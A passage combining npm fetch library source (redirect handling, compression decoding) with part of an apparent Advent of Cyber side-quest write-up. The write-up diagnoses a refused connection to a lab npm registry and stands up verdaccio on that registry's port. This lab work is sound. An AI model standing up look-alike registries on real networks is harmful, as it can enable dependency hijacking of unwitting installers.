// the body. this is done as a side effect of aborting the request except

// for in windows, where we must forward the event manually, otherwise

// there is no longer a ref'd socket attached to the request and the

// stream never ends so the event loop runs out of work and the process

// exits without warning.

// coverage skipped here due to the difficulty in testing

// istanbul ignore next

if (req.res) {

req.res.emit('error', er)

}

reject(new FetchError(`request to ${request.url} failed, reason: ${

er.message}`, 'system', er))

finalize()

})

req.on('response', res => {

clearTimeout(reqTimeout)

const headers = createHeadersLenient(res.headers)

// HTTP fetch step 5

if (fetch.isRedirect(res.statusCode)) {

// HTTP fetch step 5.2

const location = headers.get('Location')

// HTTP fetch step 5.3

let locationURL = null

try {

locationURL = location === null ? null : new URL(location, request.url).toString()

} catch {

// error here can only be invalid URL in Location: header

// do not throw when options.redirect == manual

// let the user extract the errorneous redirect URL

if (request.redirect !== 'manual') {

/* eslint-disable-next-line max-len */

reject(new FetchError(`uri requested responds with an invalid redirect URL: ${location}`, 'invalid-redirect'))

finalize()

return

}

}

// HTTP fetch step 5.5

if (request.redirect === 'error') {

reject(new FetchError('uri requested responds with a redirect, ' +

`redirect mode is set to error: ${request.url}`, 'no-redirect'))

finalize()

return

} else if (request.redirect === 'manual') {

// node-fetch-specific step: make manual redirect a bit easier to

// use by setting the Location header value to the resolved URL.

if (locationURL !== null) {

// handle corrupted header

try {

headers.set('Location', locationURL)

} catch (err) {

/* istanbul ignore next: nodejs server prevent invalid

response headers, we can't test this through normal

request */

reject(err)

}

}

} else if (request.redirect === 'follow' && locationURL !== null) {

// HTTP-redirect fetch step 5

if (request.counter >= request.follow) {

reject(new FetchError(`maximum redirect reached at: ${

request.url}`, 'max-redirect'))

finalize()

return

}

// HTTP-redirect fetch step 9

if (res.statusCode !== 303 &&

request.body &&

getTotalBytes(request) === null) {

reject(new FetchError(

'Cannot follow redirect with body being a readable stream',

'unsupported-redirect'

))

finalize()

return

}

// Update host due to redirection

request.headers.set('host', (new URL(locationURL)).host)

// HTTP-redirect fetch step 6 (counter increment)

// Create a new Request object.

const requestOpts = {

headers: new Headers(request.headers),

follow: request.follow,

counter: request.counter + 1,

agent: request.agent,

compress: request.compress,

method: request.method,

body: request.body,

signal: request.signal,

timeout: request.timeout,

}

// if the redirect is to a new hostname, strip the authorization and cookie headers

const parsedOriginal = new URL(request.url)

const parsedRedirect = new URL(locationURL)

if (parsedOriginal.hostname !== parsedRedirect.hostname) {

requestOpts.headers.delete('authorization')

requestOpts.headers.delete('cookie')

}

// HTTP-redirect fetch step 11

if (res.statusCode === 303 || (

(res.statusCode === 301 || res.statusCode === 302) &&

request.method === 'POST'

)) {

requestOpts.method = 'GET'

requestOpts.body = undefined

requestOpts.headers.delete('content-length')

}

// HTTP-redirect fetch step 15

resolve(fetch(new Request(locationURL, requestOpts)))

finalize()

return

}

} // end if(isRedirect)

// prepare response

res.once('end', () =>

signal && signal.removeEventListener('abort', abortAndFinalize))

const body = new Minipass()

// if an error occurs, either on the response stream itself, on one of the

// decoder streams, or a response length timeout from the Body class, we

// forward the error through to our internal body stream. If we see an

// error event on that, we call finalize to abort the request and ensure

// we don't leave a socket believing a request is in flight.

// this is difficult to test, so lacks specific coverage.

body.on('error', finalize)

// exceedingly rare that the stream would have an error,

// but just in case we proxy it to the stream in use.

res.on('error', /* istanbul ignore next */ er => body.emit('error', er))

res.on('data', (chunk) => body.write(chunk))

res.on('end', () => body.end())

const responseOptions = {

url: request.url,

status: res.statusCode,

statusText: res.statusMessage,

headers: headers,

size: request.size,

timeout: request.timeout,

counter: request.counter,

trailer: new Promise(resolveTrailer =>

res.on('end', () => resolveTrailer(createHeadersLenient(res.trailers)))),

}

// HTTP-network fetch step 12.1.1.3

const codings = headers.get('Content-Encoding')

// HTTP-network fetch step 12.1.1.4: handle content codings

// in following scenarios we ignore compression support

// 1. compression support is disabled

// 2. HEAD request

// 3. no Content-Encoding header

// 4. no content response (204)

// 5. content not modified response (304)

if (!request.compress ||

request.method === 'HEAD' ||

codings === null ||

res.statusCode === 204 ||

res.statusCode === 304) {

response = new Response(body, responseOptions)

resolve(response)

return

}

// Be less strict when decoding compressed responses, since sometimes

// servers send slightly invalid responses that are still accepted

// by common browsers.

// Always using Z_SYNC_FLUSH is what cURL does.

const zlibOptions = {

flush: zlib.constants.Z_SYNC_FLUSH,

finishFlush: zlib.constants.Z_SYNC_FLUSH,

}

// for gzip

if (codings === 'gzip' || codings === 'x-gzip') {

const unzip = new zlib.Gunzip(zlibOptions)

response = new Response(

// exceedingly rare that the stream would have an error,

// but just in case we proxy it to the stream in use.

body.on('error', /* istanbul ignore next */ er => unzip.emit('error', er)).pipe(unzip),

responseOptions

)

resolve(response)

return

}

// for deflate

if (codings === 'deflate' || codings === 'x-deflate') {

// handle the infamous raw deflate response from old servers

// a hack for old IIS and Apache servers

const raw = res.pipe(new Minipass())

raw.once('data', chunk => {

// see http://stackoverflow.com/questions/37519828

const decoder = (chunk[0] & 0x0F) === 0x08

? new zlib.Inflate()

: new zlib.InflateRaw()

// exceedingly rare that the stream would have an error,

// but just in case we proxy it to the stream in use.

body.on('error', /* istanbul ignore next */ er => decoder.emit('error', er)).pipe(decoder)

response = new Response(decoder, responseOptions)

resolve(response)

})

return

}

// for br

if (codings === 'br') {

// ignoring coverage so tests don't have to fake support (or lack of) for brotli

// istanbul ignore next

try {

var decoder = new zlib.BrotliDecompress()

} catch (err) {

reject(err)

finalize()

return

}

// exceedingly rare that the stream would have an error,

// but just in case we proxy it to the stream in use.

body.on('error', /* istanbul ignore next */ er => decoder.emit('error', er)).pipe(decoder)

response = new Response(decoder, responseOptions)

resolve(response)

return

}

// otherwise, use response as-is

response = new Response(body, responseOptions)

resolve(response)

})

writeToStream(req, request)

})

}

module.exports = fetch

fetch.isRedirect = code =>

code === 301 ||

code === 302 ||

code === 303 ||

code === 307 ||

code === 308

fetch.Headers = Headers

fetch.Request = Request

fetch.Response = Response

fetch.FetchError = FetchError

fetch.AbortError = AbortError

Sounds like network issues:

The error means npm (Node Package Manager) could not connect to the npm registry while trying to install packages.

Here’s a breakdown of the error:

- ECONNREFUSED: This means that your computer tried to connect to a server (in this case, a custom npm registry URL) but the connection was refused. This could be due to the server not running or being unreachable, or a firewall blocking the connection.

- npm error FetchError: This indicates that there was an issue during the fetch request to the npm registry URL http://npm-registry.bestfestivalcompany.thm:4873/express. It failed to download the express package from that registry.

- The URL (http://npm-registry.bestfestivalcompany.thm:4873/express): It appears the npm registry is hosted at a custom URL (likely internal to your organization or project). The error suggests that this server might not be reachable at the moment.
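To confirm it really is a refused connection and not something npm-specific, a quick TCP check against the registry host and port can help. This is only a minimal sketch: the function name registry_reachable is my own (hypothetical), and it assumes the hostname from the error message resolves from the machine you run it on.

```python
import socket


def registry_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a plain TCP connection to host:port succeeds."""
    try:
        # create_connection resolves the name and attempts a TCP handshake
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # ConnectionRefusedError (ECONNREFUSED), timeouts and DNS lookup
        # failures are all subclasses of OSError, so they all land here
        return False
```

Calling registry_reachable("npm-registry.bestfestivalcompany.thm", 4873) should return False while nothing is listening on that port, which would match the ECONNREFUSED seen in the npm output.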



We’ll install verdaccio (a lightweight private npm registry that uses port 4873 by default) and see if that helps with the issues

sudo npm install -g verdaccio



Now we need to listen on port 4873

verdaccio --listen 0.0.0.0:4873

Please refer to the following URL for the continuation of this:

Shout-outs to the following write-ups for some major help. Without awesome write-ups from others in the community, there's no way I would have been able to get through all 5 tasks of these Side Quests.

![Advent of Cyber 2024 [Day 3] Even if I wanted to go, their vulnerabilities wouldn’t allow it.](https://miro.medium.com/v2/resize:fit:679/0*Y6W-qTCUfAYV14EG.png)